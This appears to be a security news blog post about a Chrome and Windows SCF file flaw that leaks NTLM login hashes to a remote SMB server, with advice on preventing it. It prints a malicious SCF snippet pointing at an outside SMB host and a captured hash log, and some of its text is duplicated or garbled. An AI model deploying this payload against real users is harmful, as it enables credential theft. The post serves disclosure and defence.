A security researcher found a serious vulnerability in google chrome's latest updates which is targeting windows all versions includes windows 10. The Vulnerability allowing hackers to steal your windows login details
Researcher Bosko Stankovic of DefenseCode has found that by just visiting a website containing a malicious SCF file could allow victims to unknowingly share their computer's login credentials with hackers via Chrome and the SMB protocol.
This technique is not new and was exploited by the Stuxnet — a powerful malware that specially designed to destroy Iran's nuclear program — that used the Windows shortcut LNK files to compromise systems.
Researcher Bosko Stankovic of DefenseCode has found that by just visiting a website containing a malicious SCF file could allow victims to unknowingly share their computer's login credentials with hackers via Chrome and the SMB protocol.
This technique is not new and was exploited by the Stuxnet — a powerful malware that specially designed to destroy Iran's nuclear program — that used the Windows shortcut LNK files to compromise systems.
Chrome + SCF + SMB = Windows Login Credentials Hacked
Scf -( Shell command File ) - It is with Shortcut extension which works similar to LNK files and is intended to support a restricted set of windows commands that help define an icon on your desktop like my computer and Recycle bin.
The Hacker Just needs to victim has google chrome updated version and visit his site then ready to and apply victim's authentication credentials. Stankovin has written in his Blog post . describing the flaw.
usually , shortcut link on your desktop which has shell code that describes location of icon/thumbnail , applications name and it's location
[shell]
command=2
IconFile=explorer.exe,3
Chrome Trusts Windows SCF Files, The hacker just targeting the file with malicious code . when the victim visit his site , the file automatically gets downloaded without getting confirmation from users
As soon as the user opens the folder , suddenly or later. its get dexecuted without clicking on file. The location of remote SMB server with malicious codes which is controlled by hacker
[shell]
IconFile=\\170.170.170.170/icon
The Malicious file sending login credentials to Hacker
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
The credentials are encrypted but can be "brute-forced" later to retrieve original login password in plain text.
The SCF files which appears extensionless on explorer but the researcher said the file named as picture.jpg.scf and its open on windows explorer as JPG. This type of attacks called as inconspicuous attack with nature of SCF files.
How to Prevent This Remote SMB server Attack :
First block the outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers can not query remote SMB servers.
Researcher also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then Check the "Ask where to save each file before downloading" option.
This method will not allowing hacker to execute his file because automatic downloads are disabled
Researcher also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then Check the "Ask where to save each file before downloading" option.
This method will not allowing hacker to execute his file because automatic downloads are disabled
Google is Aware of this vulnerability they working on it . As soon as the patch will be available.
WannaCry Ransomware ?? - Read Here
No comments:
Post a Comment